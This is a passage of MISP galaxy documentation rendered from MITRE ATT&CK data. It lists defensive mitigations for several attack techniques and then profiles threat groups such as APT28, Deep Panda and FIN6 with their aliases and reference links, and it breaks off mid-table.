<h3 id="_web_shell_mitigation_t1100"><a class="anchor" href="#_web_shell_mitigation_t1100"></a><a class="link" href="#_web_shell_mitigation_t1100">Web Shell Mitigation - T1100</a></h3>
<div class="paragraph">
<p>Ensure that externally facing Web servers are patched regularly to prevent adversary access through Exploitation of Vulnerability to gain remote code access or through file inclusion weaknesses that may allow adversaries to upload files or scripts that are automatically served as Web pages.</p>
</div>
<div class="paragraph">
<p>Audit account and group permissions to ensure that accounts used to manage servers do not overlap with accounts and permissions of users in the internal network that could be acquired through Credential Access and used to log into the Web server and plant a Web shell or pivot from the Web server into the internal network. (Citation: US-CERT Alert TA15-314A Web Shells)</p>
</div>
</div>
<div class="sect2">
<h3 id="_process_doppelgänging_mitigation_t1186"><a class="anchor" href="#_process_doppelgänging_mitigation_t1186"></a><a class="link" href="#_process_doppelgänging_mitigation_t1186">Process Doppelgänging Mitigation - T1186</a></h3>
<div class="paragraph">
<p>This type of attack technique cannot be easily mitigated with preventive controls or patched since it is based on the abuse of operating system design features. For example, mitigating specific API calls will likely have unintended side effects, such as preventing legitimate process-loading mechanisms from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.</p>
</div>
<div class="paragraph">
<p>Although Process Doppelgänging may be used to evade certain types of defenses, it is still good practice to identify potentially malicious software that may be used to perform adversarial actions and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_data_obfuscation_mitigation_t1001"><a class="anchor" href="#_data_obfuscation_mitigation_t1001"></a><a class="link" href="#_data_obfuscation_mitigation_t1001">Data Obfuscation Mitigation - T1001</a></h3>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)</p>
</div>
</div>
<div class="sect2">
<h3 id="_software_packing_mitigation_t1045"><a class="anchor" href="#_software_packing_mitigation_t1045"></a><a class="link" href="#_software_packing_mitigation_t1045">Software Packing Mitigation - T1045</a></h3>
<div class="paragraph">
<p>Ensure updated virus definitions. Create custom signatures for observed malware. Employ heuristic-based malware detection.</p>
</div>
<div class="paragraph">
<p>Identify and prevent execution of potentially malicious software that may have been packed by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_security_software_discovery_mitigation_t1063"><a class="anchor" href="#_security_software_discovery_mitigation_t1063"></a><a class="link" href="#_security_software_discovery_mitigation_t1063">Security Software Discovery Mitigation - T1063</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about local security software, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_enterprise_attack_intrusion_set"><a class="anchor" href="#_enterprise_attack_intrusion_set"></a><a class="link" href="#_enterprise_attack_intrusion_set">Enterprise Attack -intrusion Set</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>Name of ATT&amp;CK Group.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Enterprise Attack -intrusion Set is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/enterprise" class="bare">https://github.com/MISP/misp-galaxy/blob/master/clusters/enterprise</a> attack -intrusion set.json[<strong>this location</strong>] The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>MITRE</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_poseidon_group_g0033"><a class="anchor" href="#_poseidon_group_g0033"></a><a class="link" href="#_poseidon_group_g0033">Poseidon Group - G0033</a></h3>
<div class="paragraph">
<p>Poseidon Group is a Portuguese-speaking threat group that has been active since at least 2005. The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the Poseidon Group as a security firm. (Citation: Kaspersky Poseidon Group)</p>
</div>
<div class="paragraph">
<p>Poseidon Group - G0033 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Poseidon Group</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 910. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0033">https://attack.mitre.org/wiki/Group/G0033</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/">https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_group5_g0043"><a class="anchor" href="#_group5_g0043"></a><a class="link" href="#_group5_g0043">Group5 - G0043</a></h3>
<div class="paragraph">
<p>Group5 is a threat group with a suspected Iranian nexus, though this attribution is not definite. The group has targeted individuals connected to the Syrian opposition via spearphishing and watering holes, normally using Syrian and Iranian themes. Group5 has used two commonly available remote access tools (RATs), njRAT and NanoCore, as well as an Android RAT, DroidJack. (Citation: Citizen Lab Group5)</p>
</div>
<div class="paragraph">
<p>Group5 - G0043 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Group5</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 911. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0043">https://attack.mitre.org/wiki/Group/G0043</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://citizenlab.org/2016/08/group5-syria/">https://citizenlab.org/2016/08/group5-syria/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pittytiger_g0011"><a class="anchor" href="#_pittytiger_g0011"></a><a class="link" href="#_pittytiger_g0011">PittyTiger - G0011</a></h3>
<div class="paragraph">
<p>PittyTiger is a threat group believed to operate out of China that uses multiple different types of malware to maintain command and control. (Citation: Bizeul 2014) (Citation: Villeneuve 2014)</p>
</div>
<div class="paragraph">
<p>PittyTiger - G0011 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>PittyTiger</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 912. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0011">https://attack.mitre.org/wiki/Group/G0011</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.cassidiancybersecurity.com/post/2014/07/The-Eye-of-the-Tiger2">http://blog.cassidiancybersecurity.com/post/2014/07/The-Eye-of-the-Tiger2</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html">https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_admin_338_g0018"><a class="anchor" href="#_admin_338_g0018"></a><a class="link" href="#_admin_338_g0018">admin@338 - G0018</a></h3>
<div class="paragraph">
<p>admin@338 is a China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as PoisonIvy, as well as some non-public backdoors. (Citation: FireEye admin@338)</p>
</div>
<div class="paragraph">
<p>admin@338 - G0018 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>admin@338</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 913. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0018">https://attack.mitre.org/wiki/Group/G0018</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html">https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rtm_g0048"><a class="anchor" href="#_rtm_g0048"></a><a class="link" href="#_rtm_g0048">RTM - G0048</a></h3>
<div class="paragraph">
<p>RTM is a cybercriminal group that has been active since at least 2015 and is primarily interested in users of remote banking systems in Russia and neighboring countries. The group uses a Trojan by the same name (RTM). (Citation: ESET RTM Feb 2017)</p>
</div>
<div class="paragraph">
<p>RTM - G0048 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>RTM</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 914. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0048">https://attack.mitre.org/wiki/Group/G0048</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf">https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt16_g0023"><a class="anchor" href="#_apt16_g0023"></a><a class="link" href="#_apt16_g0023">APT16 - G0023</a></h3>
<div class="paragraph">
<p>APT16 is a China-based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations. (Citation: FireEye EPS Awakens Part 2)</p>
</div>
<div class="paragraph">
<p>APT16 - G0023 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT16</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 915. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0023">https://attack.mitre.org/wiki/Group/G0023</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html">https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sowbug_g0054"><a class="anchor" href="#_sowbug_g0054"></a><a class="link" href="#_sowbug_g0054">Sowbug - G0054</a></h3>
<div class="paragraph">
<p>is a threat group that has conducted targeted attacks against organizations in South America and Southeast Asia, particularly government entities, since at least 2015. (Citation: Symantec Sowbug Nov 2017)</p>
</div>
<div class="paragraph">
<p>Contributors: Alan Neville, @abnev</p>
</div>
<div class="paragraph">
<p>Sowbug - G0054 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Sowbug</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 916. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0054">https://attack.mitre.org/wiki/Group/G0054</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments">https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt28_g0007"><a class="anchor" href="#_apt28_g0007"></a><a class="link" href="#_apt28_g0007">APT28 - G0007</a></h3>
<div class="paragraph">
<p>APT28 is a threat group that has been attributed to the Russian government. (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: FireEye APT28) January 2017 (Citation: GRIZZLY STEPPE JAR) This group reportedly compromised the Democratic National Committee in April 2016. (Citation: Crowdstrike DNC June 2016)</p>
</div>
<div class="paragraph">
<p>APT28 - G0007 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT28</p>
</li>
<li>
<p>Sednit</p>
</li>
<li>
<p>Sofacy</p>
</li>
<li>
<p>Pawn Storm</p>
</li>
<li>
<p>Fancy Bear</p>
</li>
<li>
<p>STRONTIUM</p>
</li>
<li>
<p>Tsar Team</p>
</li>
<li>
<p>Threat Group-4127</p>
</li>
<li>
<p>TG-4127</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 917. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0007">https://attack.mitre.org/wiki/Group/G0007</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/">https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign">https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_winnti_group_g0044"><a class="anchor" href="#_winnti_group_g0044"></a><a class="link" href="#_winnti_group_g0044">Winnti Group - G0044</a></h3>
<div class="paragraph">
<p>Winnti Group is a threat group with Chinese origins that has been active since at least 2010. The group has heavily targeted the gaming industry, but it has also expanded the scope of its targeting. Though both this group and Axiom use the malware Winnti, the two groups appear to be distinct based on differences in reporting on the groups' TTPs and targeting. (Citation: Kaspersky Winnti April 2013) (Citation: Kaspersky Winnti June 2015) (Citation: Novetta Winnti April 2015)</p>
</div>
<div class="paragraph">
<p>Winnti Group - G0044 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Winnti Group</p>
</li>
<li>
<p>Blackfly</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 918. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0044">https://attack.mitre.org/wiki/Group/G0044</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/winnti-more-than-just-a-game-130410.pdf">https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/winnti-more-than-just-a-game-130410.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/games-are-over/70991/">https://securelist.com/games-are-over/70991/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.novetta.com/wp-content/uploads/2015/04/novetta%20winntianalysis.pdf">http://www.novetta.com/wp-content/uploads/2015/04/novetta%20winntianalysis.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_deep_panda_g0009"><a class="anchor" href="#_deep_panda_g0009"></a><a class="link" href="#_deep_panda_g0009">Deep Panda - G0009</a></h3>
<div class="paragraph">
<p>Deep Panda is a suspected Chinese threat group known to target many industries, including government, defense, financial, and telecommunications. (Citation: Alperovitch 2014) The intrusion into healthcare company Anthem has been attributed to Deep Panda. (Citation: ThreatConnect Anthem) This group is also known as Shell Crew, WebMasters, KungFu Kittens, and PinkPanther. (Citation: RSA Shell Crew) Deep Panda also appears to be known as Black Vine based on the attribution of both group names to the Anthem intrusion. (Citation: Symantec Black Vine)</p>
</div>
<div class="paragraph">
<p>Deep Panda - G0009 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Deep Panda</p>
</li>
<li>
<p>Shell Crew</p>
</li>
<li>
<p>WebMasters</p>
</li>
<li>
<p>KungFu Kittens</p>
</li>
<li>
<p>PinkPanther</p>
</li>
<li>
<p>Black Vine</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 919. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0009">https://attack.mitre.org/wiki/Group/G0009</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/">https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/">https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.emc.com/collateral/white-papers/h12756-wp-shell-crew.pdf">https://www.emc.com/collateral/white-papers/h12756-wp-shell-crew.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/the-black-vine-cyberespionage-group.pdf">http://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/the-black-vine-cyberespionage-group.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_molerats_g0021"><a class="anchor" href="#_molerats_g0021"></a><a class="link" href="#_molerats_g0021">Molerats - G0021</a></h3>
<div class="paragraph">
<p>Molerats is a politically-motivated threat group that has been operating since 2012. The group&#8217;s victims have primarily been in the Middle East, Europe, and the United States. (Citation: DustySky) (Citation: DustySky)2</p>
</div>
<div class="paragraph">
<p>Molerats - G0021 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Molerats</p>
</li>
<li>
<p>Operation Molerats</p>
</li>
<li>
<p>Gaza Cybergang</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 920. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0021">https://attack.mitre.org/wiki/Group/G0021</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_strider_g0041"><a class="anchor" href="#_strider_g0041"></a><a class="link" href="#_strider_g0041">Strider - G0041</a></h3>
<div class="paragraph">
<p>Strider is a threat group that has been active since at least 2011 and has targeted victims in Russia, China, Sweden, Belgium, Iran, and Rwanda. (Citation: Symantec Strider Blog) (Citation: Kaspersky ProjectSauron Blog)</p>
</div>
<div class="paragraph">
<p>Strider - G0041 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Strider</p>
</li>
<li>
<p>ProjectSauron</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 921. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0041">https://attack.mitre.org/wiki/Group/G0041</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets">http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/faq-the-projectsauron-apt/75533/">https://securelist.com/faq-the-projectsauron-apt/75533/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sandworm_team_g0034"><a class="anchor" href="#_sandworm_team_g0034"></a><a class="link" href="#_sandworm_team_g0034">Sandworm Team - G0034</a></h3>
<div class="paragraph">
<p>Sandworm Team is a cyber espionage group that has operated since approximately 2009 and has been attributed to Russia. (Citation: iSIGHT Sandworm 2014)</p>
</div>
<div class="paragraph">
<p>Sandworm Team - G0034 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Sandworm Team</p>
</li>
<li>
<p>Quedagh</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 922. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0034">https://attack.mitre.org/wiki/Group/G0034</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html">https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fin6_g0037"><a class="anchor" href="#_fin6_g0037"></a><a class="link" href="#_fin6_g0037">FIN6 - G0037</a></h3>
<div class="paragraph">
<p>FIN6 is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors. (Citation: FireEye FIN6 April 2016)</p>
</div>
<div class="paragraph">
<p>FIN6 - G0037 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FIN6</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 923. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0037">https://attack.mitre.org/wiki/Group/G0037</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dust_storm_g0031"><a class="anchor" href="#_dust_storm_g0031"></a><a class="link" href="#_dust_storm_g0031">Dust Storm - G0031</a></h3>
<div class="paragraph">
<p>Dust Storm is a threat group that has targeted multiple industries in Japan, South Korea, the United States, Europe, and several Southeast Asian countries. (Citation: Cylance Dust Storm)</p>
</div>
<div class="paragraph">
<p>Dust Storm - G0031 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Dust Storm</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 924. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0031">https://attack.mitre.org/wiki/Group/G0031</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cylance.com/content/dam/cylance/pdfs/reports/Op%20Dust%20Storm%20Report.pdf">https://www.cylance.com/content/dam/cylance/pdfs/reports/Op%20Dust%20Storm%20Report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cleaver_g0003"><a class="anchor" href="#_cleaver_g0003"></a><a class="link" href="#_cleaver_g0003">Cleaver - G0003</a></h3>
<div class="paragraph">
<p>Cleaver is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver. (Citation: Cylance Cleaver) Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 (TG-2889). (Citation: Dell Threat Group 2889)</p>
</div>
<div class="paragraph">
<p>Cleaver - G0003 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Cleaver</p>
</li>
<li>
<p>TG-2889</p>
</li>
<li>
<p>Threat Group 2889</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 925. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0003">https://attack.mitre.org/wiki/Group/G0003</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance%20Operation%20Cleaver%20Report.pdf">https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance%20Operation%20Cleaver%20Report.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/">http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt12_g0005"><a class="anchor" href="#_apt12_g0005"></a><a class="link" href="#_apt12_g0005">APT12 - G0005</a></h3>
<div class="paragraph">
<p>APT12 is a threat group that has been attributed to China. (Citation: Meyers Numbered Panda)</p>
</div>
<div class="paragraph">
<p>APT12 - G0005 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT12</p>
</li>
<li>
<p>IXESHE</p>
</li>
<li>
<p>DynCalc</p>
</li>
<li>
<p>Numbered Panda</p>
</li>
<li>
<p>DNSCALC</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 926. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0005">https://attack.mitre.org/wiki/Group/G0005</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.crowdstrike.com/blog/whois-numbered-panda/">http://www.crowdstrike.com/blog/whois-numbered-panda/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_neodymium_g0055"><a class="anchor" href="#_neodymium_g0055"></a><a class="link" href="#_neodymium_g0055">NEODYMIUM - G0055</a></h3>
<div class="paragraph">
<p>is an activity group that conducted a campaign in May 2016 and has heavily targeted Turkish victims. The group has demonstrated similarity to another activity group called due to overlapping victim and campaign characteristics. (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21)</p>
</div>
<div class="paragraph">
<p>NEODYMIUM - G0055 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>NEODYMIUM</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 927. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
